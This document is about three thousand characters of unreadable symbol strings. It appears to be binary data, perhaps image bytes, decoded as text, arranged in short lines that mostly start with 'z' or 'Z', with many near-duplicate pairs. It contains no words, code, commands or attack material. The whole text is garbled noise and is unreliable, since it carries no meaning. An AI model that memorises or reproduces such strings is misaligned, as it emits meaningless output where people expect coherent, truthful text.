zqte\k\SXMEYPGRHASIBPE=RI@TKBRG?OD<PC;OB:OB:OD<PE=QD<QF>WMFWQL\SOVLEQE?NC;QKDVRMXOKWMFSJAPG>OD<QF>OF=QH?OD<K@8K>6I<4I<4K>6I<4J=5H;3J=5G:2I92I92H81I<4G:2I<4J=5I92K;4LA9RG?SH@SGATJCSIBUKDULCSIBPG>RI@QF>UJBQH?PF?QE?QE?OF=PC;QA:PC;UKDTLETLEUKDVLETJCSGAJ=5H90E9/F:0G8/F7.C7-D8,E9-NB<UKDUKDVLEUKDUKDSIBRHASH@PE=RG?QF>OC=M@8MB:PE=UKDUOJ[UPZRKWMFWMFYQJXTOYSNUKDQH?PC;K@8L?7K>6L?7L@6MC9NC;QF>SH@UKDVLEXNGWOHUKDULCQH?PE=RG?OD<RG?NC;QF>MB:QF>OF=NE<RG?OF=OF=PG>PE=NC;PE=OD<MB:MB:NA9M@8M@8K@8J?7K?5L@6L=4J=5NA9J?7MB:OF=LC:NE<PE=RG?OD<PE=OD<RF@VLESKDTJCTJCVMDRI@SH@RF@OC=PE=NE<NE<OD<NC;NC;NA9NA9M@8OB:RE=TIAVLEXRM\SOZQMVLEPE=TIAXPIXPIVMDRG?OD<NC;PE=SH@WLDdXRuic
zqw]LoN:
ZqyJaiRgoWhqm
ZqyJaiRgoWipm
zR[>5oL?
zRdXR|og
zR_F<uUJ
zR[H@t^R
zR\J?v^R
ZRKM:3M1*B("D)
ZRK<RE=SI?^UKl`Vtkazog
zR]LCt`U
zR]NEraX
Zr~NhvOjxOp
Zrp_bfn]h|`f
Zrr`0$l4!
zR]SIxlb
zR`UMxkc
zRWB:xdY
ZRyUMpM@sL>xNA
ZRyVLpM@sL>xO@
ZRY% "YTVsqw2/8&!"lWO
@+~<)z:(r:)z?0
zr|]Z\LMIQUOT[TDJEMUTdnnWci\iqfw
zr|[Z\MNJQUOSZSDKDNVUdnnWci\iqfw
Zs}Ibf9NO.CA.CA.@?8HGEPNVUQbWOwdU
Zs}Ibf9NO/DB/DB.@?8HGEPNWVRaVNwdU
zS_K@jQG
ZSkLCfH=eH?~`[
zTaQJwf]
zTbLFvUL
zTcVN~md
ZTe<F66G%7E)9F,2>,4>.RRF
zTeXPo`W
zT`F@w^T
zTfZT{ph
ZTg<F66G%7E)8E-2>,6=.RRF
\ZTGYPG[QG\SIaXNndZ{n`
zT[NFraX
zT_PGxkc
zT]PHte\
z}tpqlinje
zTQA:dRK
zT^QIzi`
z}tqqlinje
[Z}TRyTV{OVxQYoR[lNYdJWtQ[vT[zQX{U[
zTX<5nMD
ztyvlrymstei
zTZI@q[P
ztztogaZcZVbYU`WSaXTd[WbZSME>YPL\VQVPKQB?SHDVMJVJHQDBUFDRFBh]Yk^Vk]Wk_[nb^p_VpVJkN@nQBv^R|f[{d\
ztztoh_[cZVaXT_VR`WSd[WbYUMD@YPL\VQUOJQB?SHDVMJUIGTECUFCRFBh]Yl_Wj\Vj][nb^p^WpVJkN?nQBx]S
@z}]u2o
Z[ucjpemsdlykm
zur~zyvywaheeso
zur~zywzx`fedqo
}}zutvrqlnnSYXfqo
}}zutvrqmpnRXWfqo
`ZU^UQfZXdYUg\Tj_WmWLs\Ms]QlUFqZJpS>oM5zQ8
'||(zv%
zv~a]}^][>:U:6T:4_C<aD=dD?pOL
zv~a]}^][>:X;6V94_C<aD=dD?pOL
ZVoGAZVMbVJ\3*4
ZVoIAXVMbVK[3*4
z|vozti
zv{ss{vulmkMRPz
zvuiepa^fUReUOl[Xsc]wgavf_qd\n_Vp`Yqd\
zvuiepa^fURgTOl[Xsc]wgavf_pc[n_Vp`Yqd\
zv{vs|xw{wv|||
z{vw{xp{vr~tqz
zvynjxmi{plynj|pnvmjqjgxsp
ZVzWUymk
ZVzWUynm
zwlZSpZOyaU~YQ
Z`wMRgEIaGKcMRkISkDReBMcCMeANd=Ka8I\6GZ3GX+@O*>O$6G
Z`wNRjEIaFJbMRkKRkFQe@McALgAMe>Lb:I\6GZ3GX+@O*>O$6G
z}wp{uj
Zw{Qkq8Q[5O[Dbme
zwr_\dQNgTQeUOeSL`NGdQJeSLcQJbOJdQLfSNcPKRB<k[U
zwr_\dQNgTQgTOeSL`NGdQIeSLcQJcPKcPKfSNdQLRB<kZW
ZWS69G25?,/;)*8&'@+-@+-?+*>*):&%8$#6"!5$!6%"6%"8'$9&#:%#?*(@+*=)(,
ZWU69G25?,/;)*8&'@+-?*,?*,>*)9%$7#"6"!5#"6%"8%":'$9&#;&$@+)@+*:(',
zw{wvurnzwswqr}yxzxwaaaRWV
~z|{wytsrpoafeNPP
@,{;)z<,x=-{C2
z|XFsC+|F-
zx_ML]JGiXUgWQ[JGUB?WD?\JCbPIfSNaNIYIB[OIQFBwkih^^.'*=6;wpuYRW+$+C<C
ZXv^]}ba
zxwnlkomlrnmokjplknlkikkdih\cfgps
zxxnlkomlpnnplkplknlljlldih[begpt
zxxwww
zxynjxmi{plzok}qovmjqjgxsp
}zY40C
Z?{YA}]J
Z={YB{WE
zyf^^f\\j``sgetieod`tierielc_jd_mgbhd_
zyf^^f\\j``sgetieod`tietielc_jd_mgbgc^
zymYX^JIdQNiXUmZUiWPdRK^LE]JEdPKgRPcTR\PNNB@j^^thhJ>>QFHzoq
zymYX^KHdQNkXUmZUiVQdRK]KD]JEdPKgRPcTR\PNNB@k__thhJ>>QFHzoq
ZY|SQyTV|PWxQYoR[lNYdJWvQYvT[yPW{U[
}~zyupmqliqliolhlji\\\NSR
ZYu\Zx^^
zy~zysvtMTQnyv
_Zzb\}je|lf
?$}?'Zzb[w`c{cav]_oX`n\XkVScRPbUI]PI]PF_QE\NGYLHYLNWJO\LOYIPPBMP@GO8B@(=,
?z!?z$@}+C}1I}7L
Z`zchvenvep{hq
zznddthh|pp
zzQMHIG?IKEHMLEJKCJG@FA@D?=E;:B8<@:;?96:415/-5+08.,/-111+--*/.'+&**$* 
ZZSDWG@PC;SF>WKAbQHtaY
zzspxpq}prrec
|zzsrvnhmmccwe^
\Z`><<[ZV
ZZx^^|Zb
ZZx]]{Zb
zzz^^^bbb
zzzPPP